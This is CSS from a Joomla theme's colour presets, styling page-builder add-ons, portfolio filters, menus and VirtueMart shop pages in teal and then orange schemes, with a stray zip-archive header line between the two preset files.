.sppb-addon-module .relateditems >li span,
.sppb-addon-module .relateditems >li p {
  color: #999999;
}
.sp-module ul.category-module >li span >i,
.sp-module ul.category-module >li p >i,
.sp-module .relateditems >li span >i,
.sp-module .relateditems >li p >i,
.sppb-addon-module ul.category-module >li span >i,
.sppb-addon-module ul.category-module >li p >i,
.sppb-addon-module .relateditems >li span >i,
.sppb-addon-module .relateditems >li p >i {
  color: #4beacc;
}
.sp-module ul.category-module >li a.mod-articles-category-title,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title {
  color: #000000;
}
.sp-module ul.category-module >li a.mod-articles-category-title:hover,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title:hover {
  color: #16b99a;
}
.sp-module .tagscloud .tag-name,
.sppb-addon-module .tagscloud .tag-name {
  color: #666666;
}
.sp-module .tagscloud .tag-name:hover,
.sppb-addon-module .tagscloud .tag-name:hover {
  background: #19d0ad;
  border-color: #16b99a;
  color: #fff;
}
.tag-category ul.category li h3 >a {
  color: #595959;
}
.tag-category ul.category li h3 >a:hover {
  color: #16b99a;
}
.tags a.label {
  background-color: rgba(45,45,45,0.45);
}
.tags a.label:hover {
  background: #19d0ad;
}
.tags >span >i {
  color: #c4c4c4;
}
.tags:hover >span >i {
  color: #919191;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a {
  color: #1a1a1a;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a:hover {
  color: #16b99a;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a {
  color: #16b99a;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a:hover {
  color: #16b99a;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li span.simple-divider {
  color: #90f2df;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a {
  background: #16b99a;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover {
  background: #16b99a;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a {
  background-color: #16b99a;
  background-color: rgba(22,185,154,0.8);
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover {
  background-color: #16b99a;
  box-shadow: 0 1px 3px rgba(0,0,0,0.3);
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fa {
  color: #16b99a;
}
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fa {
  color: #1ee4be;
}
input[type="text"]:focus {
  border: 1px solid #16b99a;
}
.search input#mod-search-searchword:focus,
.search input#search-searchword:focus,
.search input#mod_virtuemart_search:focus {
  border: 1px solid #16b99a;
}
.search:before {
  color: #1ee4be;
}
.search:hover:before,
.search:focus:before,
.search:active:before {
  color: #1a1a1a;
}
.search .btn-toolbar button {
  background: #16b99a;
}
.post-format-masonry > i {
  background-color: #16b99a;
  background-color: rgba(22,185,154,0.7);
}
.post-format {
  background-color: #16b99a;
  background-color: rgba(22,185,154,0.9);
}
.entry-link,
.entry-quote {
  background-color: #16b99a;
  background-color: rgba(22,185,154,0.9);
}
blockquote {
  border-color: #16b99a;
}
.sp-comingsoon body {
  background-color: #13a287;
}
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover,
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover i {
  color: #fff;
}
.sp-comingsoon body.with-bckg-img a.logo {
  background: rgba(20,20,20,0.45);
}
.sp-comingsoon body.with-bckg-img .days .number,
.sp-comingsoon body.with-bckg-img .hours .number,
.sp-comingsoon body.with-bckg-img .seconds .number,
.sp-comingsoon body.with-bckg-img .minutes .number {
  border: 1px solid rgba(255,255,255,0.5);
  background-color: rgba(0,0,0,0.2);
}
.sp-comingsoon body.with-bckg-img .social-icons {
  background-color: rgba(0,0,0,0.2);
}
.pagination>li>a,
.pagination>li>span {
  color: #000000;
}
.pagination>li>a:hover,
.pagination>li>a:focus,
.pagination>li>span:hover,
.pagination>li>span:focus {
  color: #000000;
}
.pagination>.active>a,
.pagination>.active>span {
  border-color: #16b99a;
  background-color: #16b99a;
}
.pagination>.active>a:hover,
.pagination>.active>a:focus,
.pagination>.active>span:hover,
.pagination>.active>span:focus {
  border-color: #16b99a;
  background-color: #16b99a;
}
.sppb-addon h3.sppb-addon-title {
  color: #1a1a1a;
}
.sppb-addon h3.sppb-addon-title:after {
  background: #1ee4be;
}
.sppb-panel-default .sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-default .sppb-panel-heading.active,
.sppb-panel-default .sppb-panel-heading.active:before {
  color: #16b99a;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title {
  color: #16b99a;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title >i,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title >i {
  color: #1ee4be;
}
.sppb-panel-primary {
  border: none;
}
.sppb-panel-primary >.sppb-panel-heading {
  background-color: #16b99a;
}
.sppb-panel-flex >.sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-flex >.sppb-panel-heading:after {
  color: #808080;
}
.sppb-panel-flex >.sppb-panel-heading.active {
  border-bottom: 1px solid #16b99a;
}
.sppb-panel-flex >.sppb-panel-heading.active:after {
  color: #16b99a;
}
.sppb-panel-flex >.sppb-panel-heading.active .sppb-panel-title >i {
  color: #16b99a;
}
.sppb-panel-flex >.sppb-panel-heading +.sppb-panel-collapse > .sppb-panel-body {
  border-bottom: 1px solid #16b99a;
}
.sppb-addon-countdown.flex .sppb-countdown-number {
  background-color: #16b99a;
  border: 2px solid rgba(0,0,0,0.2);
  text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
}
.entry-header h1 a,
.entry-header h2 a {
  color: #000000;
}
.entry-header h1 a:hover,
.entry-header h1 a:focus,
.entry-header h2 a:hover,
.entry-header h2 a:focus {
  color: #16b99a;
}
.entry-header h1:after,
.entry-header h2:after {
  background: #1ee4be;
}
.html-style span {
  background: #1addb8;
}
ul.site-list li {
  color: #000000;
}
ul.site-list li i {
  color: #1addb8;
}
.bullets .li-circle {
  color: #16b99a;
}
.dropcaps .naked-drop span {
  color: #16b99a;
}
.dropcaps .full-drop span {
  background: #16b99a;
}
.sp-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title:after {
  background: #1ee4be;
}
.cd-pagination li.active >a {
  background-color: #16b99a;
  color: #fff;
}
.cd-pagination a {
  background-color: #fafafa;
}
.cd-pagination a:hover,
.cd-pagination a:focus {
  background-color: #16b99a;
  color: #fff;
}
.cd-pagination a:active {
  background-color: #0b5e4e;
}
.sppb-addon-single-image .sppb-addon-content a .overlay >i:before {
  background-color: rgba(22,185,154,0.8);
}
.sppb-addon-single-image .sppb-addon-content a .overlay:after {
  background-color: rgba(51,51,51,0.25);
  box-shadow: inset 0 0 50px rgba(51,51,51,0.9);
}
.sppb-progress .sppb-progress-bar-default,
.sppb-progress .sppb-progress-bar.flex,
.sppb-progress .sppb-progress-bar.custom {
  background-color: #16b99a;
}
.sppb-nav-tabs >li >a {
  color: #16b99a;
}
.sppb-nav-tabs >li.active >a {
  color: #333333;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a {
  border-top-color: #1ee4be;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a:hover,
.flex .sppb-tab .sppb-nav-tabs >li.active >a:focus {
  border-top-color: #1ee4be;
}
.sppb-nav-modern >li >a {
  background: transparent;
  color: #333333;
}
.sppb-nav-modern >li.active >a {
  color: #16b99a;
}
.sppb-nav-modern >li.active >a:hover,
.sppb-nav-modern >li.active >a:focus {
  color: #16b99a;
}
.sppb-nav-lines >li >a {
  background: transparent;
}
.sppb-nav-lines >li >a >i {
  color: #666666;
}
.sppb-nav-lines >li >a:hover >i,
.sppb-nav-lines >li >a:focus >i {
  color: #333333;
}
.sppb-nav-lines >li.active >a,
.sppb-nav-lines >li.active >a:focus,
.sppb-nav-lines >li.active >a:hover {
  background-color: transparent;
  color: #16b99a;
  border-bottom-color: #16b99a;
}
.sppb-nav-lines >li.active >a >i,
.sppb-nav-lines >li.active >a:focus >i,
.sppb-nav-lines >li.active >a:hover >i {
  color: #16b99a;
}
.sppb-nav-pills >li >a {
  color: #333333;
  background: transparent;
}
.sppb-nav-pills >li >a >i {
  color: #666666;
}
.sppb-nav-pills >li >a:hover >i,
.sppb-nav-pills >li >a:focus >i {
  color: #333333;
}
.sppb-nav-pills >li.active >a {
  background-color: transparent;
  color: #16b99a;
  box-shadow: inset 0 0 0 1px #16b99a;
}
.sppb-nav-pills >li.active >a >i {
  color: #16b99a;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star {
  color: #1ee4be;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star-o {
  color: #c0c0c0;
}
.pro-client-url {
  color: #16b99a;
}
.sppb-pricing-box {
  box-shadow: inset 0 0 1px #999999;
}
.sppb-pricing-box.sppb-pricing-featured {
  background: transparent;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-header {
  background-color: #16b99a;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-features {
  color: #000000;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper {
  position: relative;
  overflow: hidden;
  max-width: 100%;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper >a:after,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper >a:after {
  background: #16b99a;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item h2.entry-title a {
  color: #404040;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner:hover h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item:hover h2.entry-title a {
  color: #16b99a;
}
.light .sppb-selector span i {
  color: #79efd9;
}
.light .sppb-selector >i {
  color: #62ecd2;
}
.light .sppb-selector:hover span i {
  color: #fff;
}
.light .sppb-selector:hover i {
  color: #79efd9;
}
.flex .sppb-addon-content .gm-zoom-in,
.flex .sppb-addon-content .gm-zoom-out {
  background-color: #1ee4be;
  opacity: 0.77;
}
.flex .sppb-addon-content .gm-zoom-in:hover,
.flex .sppb-addon-content .gm-zoom-out:hover {
  background-color: #19d0ad;
  opacity: 1;
}
.sppb-addon .sppb-icon {
  color: #16b99a;
  line-height: 1.5;
}
.sppb-media.default >a:hover img.sppb-media-object,
.sppb-media.flex >a:hover img.sppb-media-object {
  border-color: #16b99a;
}
.sppb-media.default >a:hover >i,
.sppb-media.flex >a:hover >i {
  border-color: #16b99a;
}
.sppb-media.default >.sppb-media-body >i.fa,
.sppb-media.flex >.sppb-media-body >i.fa {
  color: #79efd9;
}
.sppb-media footer strong {
  color: #19d0ad;
}
.sp-module .sp-module-title,
.sppb-addon-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title .divider,
.sppb-addon-module .sp-module-title .divider {
  background: #1ee4be;
}
.sp-module .divider,
.sppb-addon-module .divider {
  background: #cccccc;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #4beacc;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]:focus {
  border: 1px solid #19d0ad;
  box-shadow: 0 0 5px rgba(22,185,154,0.3);
}
.sppb-addon-ajax-contact.dark .sppb-form-group label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder] {
  color: #f0f0f0;
  border: 1px solid #999;
  border: 1px solid rgba(200,200,200,0.8);
  background: transparent;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-moz-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #27e5c1;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]:focus {
  border: 1px solid #35e7c5;
}
.sppb-addon-ajax-contact.dark .tos label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .tos label a {
  color: #35e7c5;
}
.sppb-addon-ajax-contact.dark .tos label a:hover {
  color: #62ecd2;
}
.dark .acymailing_form input.inputbox {
  color: #3ee8c8;
}
.dark .acymailing_form input.inputbox:focus {
  border: 1px solid #35e7c5;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper:before {
  background-color: #4beacc !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:before {
  border: 2px solid #1ee4be !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:after {
  background-color: #4beacc !important;
}
.error-page .error-page-inner >div.container .btn-error {
  background: #19d0ad;
}
.error-page .error-page-inner >div.container .btn-error:hover {
  background: #16b99a;
}
.error-page .error-page-inner >div.container .fa-exclamation-triangle {
  color: #35e7c5;
}
.error-page .error-page-inner >div.container .error-code {
  color: #1ee4be;
}
.error-page .error-page-inner.with-bckg-img div.container .pe-7s-compass {
  color: #fff;
  text-shadow: 1px 3px 6px rgba(0,0,0,0.1);
}
.error-page .error-page-inner.with-bckg-img div.container .error-code {
  color: #19d0ad;
}
.sp-layer h1,
.sp-layer h2,
.sp-layer h3,
.sp-layer h4,
.sp-layer h5,
.sp-layer h6,
.sp-layer i.major_color {
  color: #19d0ad;
}
.sp-button {
  border-color: #35e7c5 !important;
}
.sp-selected-button {
  background-color: #16b99a !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation {
  color: #000000;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a {
  color: #16b99a !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a:hover {
  color: #0e7561 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .show-cart {
  color: #fff;
}
.quantity {
  background-color: rgba(22,185,154,0.8);
}
.cd-customization .add-to-cart {
  background-color: #16b99a;
}
.cd-customization .add-to-cart:hover {
  background-color: #12997f;
}
.no-touch .cd-customization .add-to-cart:hover {
  background-color: #12997f;
}
.productdetails-view .vm-product-details-inner .product-price .vm-price-desc+span {
  color: #16b99a;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 {
  color: #555;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 >i {
  color: #27e5c1;
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:after {
  color: #fff;
  background: rgba(85,85,85,0.3);
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:after {
  background: #16b99a;
}
.productdetails-view .vm-product-details-inner .product-neighbours .empty-previous-page,
.productdetails-view .vm-product-details-inner .product-neighbours .empty-next-page {
  color: #fff;
  text-shadow: 1px 1px 0px rgba(85,85,85,0.08);
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.08);
}
.productdetails-view .icons a {
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.1);
}
.productdetails-view .icons a:hover {
  color: #fff;
  background: rgba(22,185,154,0.8);
}
.productdetails-view .products-desc-tab .nav-tabs >li.active >a {
  background: transparent;
  border-bottom: 1px solid #fff;
  border-right: 1px solid #e2e2e2;
  border-left: 1px solid #e2e2e2;
  box-shadow: 0 -1px 0px #16b99a;
  border-top: 1px solid rgba(22,185,154,0.8);
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews span.date >i {
  color: #35e7c5;
}
.empty_cart >i.pe >span {
  color: #fff;
  background-color: rgba(22,185,154,0.35);
}
#fancybox-wrap #fancybox-content .continue_link,
#fancybox-wrap #fancybox-content .showcart {
  color: #fff;
  background-color: #16b99a;
}
.cart-view input[value="Logout"],
.cart-view input[name="changeShopper"],
.cart-view input[value="Search in shop"] {
  background-color: #16b99a;
}
.cart-view input[value="Logout"]:hover,
.cart-view input[name="changeShopper"]:hover,
.cart-view input[value="Search in shop"]:hover {
  background: #13a287;
}
.cart-view fieldset.userdata #com-form-login-remember input {
  background-color: #16b99a;
}
.cart-view fieldset.userdata #com-form-login-remember input:hover {
  background-color: #118b74;
}
.cart-view .billto-shipto a.details {
  background: #16b99a;
}
.cart-view .billto-shipto a.details:hover {
  background: #118b74;
}
.cart-view table.cart-summary tr th {
  background: #16b99a;
  border: solid 1px #16b99a;
}
.cart-view table.cart-summary input.details-button {
  background: #16b99a;
}
.cart-view table.cart-summary .vm2-add_quantity_cart {
  background: #16b99a;
}
.sectiontableentry1 td a.change-payment {
  color: #1ee4be;
}
.sectiontableentry1 td a.change-payment:hover {
  color: #16b99a;
}
.vm-button-correct {
  background-color: #16b99a;
}
.vm-button-correct:hover {
  background-color: #13a287;
}
.vm-button {
  background-color: #1ee4be;
}
#com-form-login-remember input.default {
  background: #16b99a;
}
#com-form-login-remember input.default:hover {
  background: #13a287;
}
.control-buttons .vm-button-correct {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.control-buttons .vm-button-correct:hover,
.control-buttons .vm-button-correct:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #16b99a;
  color: #16b99a;
}
.control-buttons button.default {
  background: #16b99a;
}
.control-buttons button.default:hover {
  background: #13a287;
}
span.userfields_info {
  color: #16b99a;
  border-bottom: 1px solid #16b99a;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer {
  border: 1px solid rgba(128,128,128,0.2);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .title:before {
  color: #959595;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist {
  border-left: 1px solid rgba(128,128,128,0.3);
  border-right: 1px solid rgba(128,128,128,0.3);
  background: rgba(255,255,255,0.9);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div a {
  color: #000000;
  border-bottom: 1px solid rgba(128,128,128,0.3);
}
.sp-module-content ul.VMmenu li div > a >.nmb_products {
  color: #000000;
}
.vm-flex-search input:focus {
  border: 1px solid #16b99a;
}
.vm-flex-search input:focus + .vm-search-button >i {
  color: #16b99a;
}
.vm-flex-search .vm-search-button >i {
  color: #35e7c5;
}
.currency-selector-module button.btn >i,
.currency-selector-module input.btn >i {
  color: #555;
}
.currency-selector-module button.btn >i:hover,
.currency-selector-module input.btn >i:hover {
  color: #16b99a;
}
.chzn-container-active .chzn-single {
  border: 1px solid #16b99a !important;
}
.chzn-container-active.chzn-with-drop .chzn-results li.highlighted {
  background: rgba(0,0,0,0.4);
}
.vm-price-box ins {
  color: #16b99a;
}
.vm-menu .vm-title {
  border-top: 1px solid #1ee4be;
}
.vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #16b99a;
}
header.color .vm-menu .vm-title {
  color: #262626;
  border-top: 1px solid rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li {
  box-shadow: 0 1px 0px rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #000000;
}
header.color .vm-menu ul.productdetails:last-child li {
  box-shadow: none;
}
.alert-notice {
  box-shadow: 0 0 0 1px rgba(85,85,85,0.1), 0 2px 3px rgba(85,85,85,0.07);
}
@keyframes fade-in {
  to {
    opacity: 1;
    fill: rgba(22,185,154,0.9);
    stroke-dashoffset: 0;
    stroke-width: 0;
  }
}
@keyframes flex_after_fade_default {
  to {
    opacity: 1;
    stroke-width: 0;
    stroke-dashoffset: 0;
    fill: rgba(85,85,85,0.7);
    stroke: rgba(85,85,85,0.7);
  }
}
@keyframes flex_after_f_top {
  to {
    opacity: 1;
    stroke-width: 5;
    stroke-dashoffset: 0;
    fill: rgba(22,185,154,0.85);
    stroke: #16b99a;
  }
}
PK!mL��@�@�flex/css/presets/preset2.cssnu&1i�.major_color_bckg-100 {
  background-color: #fca224;
}
.major_color_bckg-90 {
  background-color: rgba(252,162,36,0.9);
}
.major_color_bckg-80 {
  background-color: rgba(252,162,36,0.8);
}
.major_color_bckg-70 {
  background-color: rgba(252,162,36,0.7);
}
.major_color_bckg-60 {
  background-color: rgba(252,162,36,0.6);
}
.major_color_bckg-50 {
  background-color: rgba(252,162,36,0.5);
}
.major_color_bckg-40 {
  background-color: rgba(252,162,36,0.4);
}
.major_color_bckg-30 {
  background-color: rgba(252,162,36,0.3);
}
.major_color_bckg-20 {
  background-color: rgba(252,162,36,0.2);
}
.major_color_bckg-10 {
  background-color: rgba(252,162,36,0.1);
}
.black_bckg-90 {
  background-color: rgba(0,0,0,0.9);
}
.black_bckg-80 {
  background-color: rgba(0,0,0,0.8);
}
.black_bckg-70 {
  background-color: rgba(0,0,0,0.7);
}
.black_bckg-60 {
  background-color: rgba(0,0,0,0.6);
}
.black_bckg-50 {
  background-color: rgba(0,0,0,0.5);
}
.black_bckg-40 {
  background-color: rgba(0,0,0,0.4);
}
.black_bckg-30 {
  background-color: rgba(0,0,0,0.3);
}
.black_bckg-20 {
  background-color: rgba(0,0,0,0.2);
}
.black_bckg-10 {
  background-color: rgba(0,0,0,0.1);
}
.white_bckg-90 {
  background-color: rgba(255,255,255,0.9);
}
.white_bckg-80 {
  background-color: rgba(255,255,255,0.8);
}
.white_bckg-70 {
  background-color: rgba(255,255,255,0.7);
}
.white_bckg-60 {
  background-color: rgba(255,255,255,0.6);
}
.white_bckg-50 {
  background-color: rgba(255,255,255,0.5);
}
.white_bckg-40 {
  background-color: rgba(255,255,255,0.4);
}
.white_bckg-30 {
  background-color: rgba(255,255,255,0.3);
}
.white_bckg-20 {
  background-color: rgba(255,255,255,0.2);
}
.white_bckg-10 {
  background-color: rgba(255,255,255,0.1);
}
.black-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.5);
}
.black-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.4);
}
.black-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.3);
}
.black-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.2);
}
.black-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.1);
}
.white-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.5);
}
.white-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.4);
}
.white-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.3);
}
.white-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.2);
}
.white-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.1);
}
.major_color {
  color: #fca224 !important;
}
.white_color {
  color: #fff;
}
.text_color {
  color: #000000;
}
.major_color-lighten-10 {
  color: #fdb756;
}
.major_color-lighten-20 {
  color: #fdcd89;
}
.major_color-lighten-30 {
  color: #fee2bb;
}
.gray-shadow-50 {
  box-shadow: 0 0 50px rgba(85,85,85,0.5);
}
.gray-shadow-40 {
  box-shadow: 0 0 40px rgba(128,128,128,0.4);
}
.gray-shadow-30 {
  box-shadow: 0 0 30px rgba(128,128,128,0.3);
}
.gray-shadow-20 {
  box-shadow: 0 0 20px rgba(128,128,128,0.3);
}
.gray-shadow-10 {
  box-shadow: 0 0 10px rgba(128,128,128,0.3);
}
.transparent {
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent li.active a {
  color: #fca224;
  border-bottom: 2px solid #fca224;
}
#sp-header.onepage .sp-megamenu-parent li.active:first-child >a.page-scroll {
  color: #fca224;
  border-bottom: 2px solid #fca224;
}
#sp-header.onepage .sp-megamenu-parent ul li a {
  border-bottom-width: 0px !important;
  border-right: 2px solid transparent;
  border-radius: 0 !important;
}
#sp-header.onepage .sp-megamenu-parent ul li a:hover {
  color: #fca224;
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent ul li.active a {
  border-right: 2px solid #fca224;
}
#sp-header #sp-menu .sp-megamenu-parent >li.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent >li.sp-has-child.active>a {
  color: #fdb756;
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active:hover>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item a:hover {
  color: #fff;
  background-color: #fca224;
  background-color: rgba(252,162,36,0.8);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a:hover {
  background: transparent !important;
  border-bottom: 1px solid rgba(0,0,0,0.15);
  box-shadow: 0 1px 0px rgba(250,250,250,0.15);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a:hover {
  background: transparent;
}
#sp-header .top-search-wrapper .searchwrapper {
  box-shadow: 0 0 0 6px rgba(252,162,36,0.5);
}
#sp-header #cart-menu {
  padding: 0;
}
#sp-header #cart-menu #cd-menu-trigger .empty_basket,
#sp-header #cart-menu #cd-menu-trigger .items-added,
#sp-header #cart-menu .cd-cart .empty_basket,
#sp-header #cart-menu .cd-cart .items-added {
  background-color: #fca224;
}
#sp-header #cart-menu #cd-menu-trigger.menu-is-open >i,
#sp-header #cart-menu .cd-cart.menu-is-open >i {
  font-size: 30px;
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger >i,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart >i {
  background-color: rgba(51,51,51,0.75);
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger.menu-is-open .total_products,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart.menu-is-open .total_products {
  right: 27px;
  font-size: 11px;
  line-height: 18px;
  height: 18px;
  width: 18px;
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner {
  background: rgba(252,162,36,0.85);
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item.current-item>a,
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item a:hover {
  background-color: #b76c03;
  background-color: rgba(0,0,0,0.25);
}
.overflow-hidden {
  overflow-x: hidden;
}
.sp-module ul.accordion-menu > li .offcanvas-menu-toggler .close-icon {
  color: #fca224;
}
.sp-module ul.accordion-menu li.current > a {
  color: #fca224;
}
.nav.menu li.current > a {
  color: #fca224;
}
.close-offcanvas:hover {
  border: 1px solid #fca224;
  color: #fca224;
}
.full-screen .offcanvas-menu,
.full-screen-off-canvas-ftop .offcanvas-menu {
  margin-bottom: 10vh;
}
.full-screen .offcanvas-menu .search input,
.full-screen-off-canvas-ftop .offcanvas-menu .search input {
  height: 44px;
}
.full-screen .offcanvas-menu .flex-search:before,
.full-screen-off-canvas-ftop .offcanvas-menu .flex-search:before {
  line-height: 44px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler {
  padding: 5px 15px;
  line-height: 18px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon {
  font-size: 16px;
}
.slide-top-menu .offcanvas-menu {
  margin-bottom: 10vh;
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.slide-top-menu .offcanvas-menu .separator,
.slide-top-menu .offcanvas-menu .nav-header {
  color: #b3b3b3;
}
.new-look .offcanvas-menu {
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.new-look .offcanvas-menu .sp-module ul >li .separator,
.new-look .offcanvas-menu .sp-module ul >li .nav-header {
  color: #999999;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:before {
  background: #fca224 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:after {
  background: #fca224 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:before {
  background: #eee none repeat scroll 0 0;
}
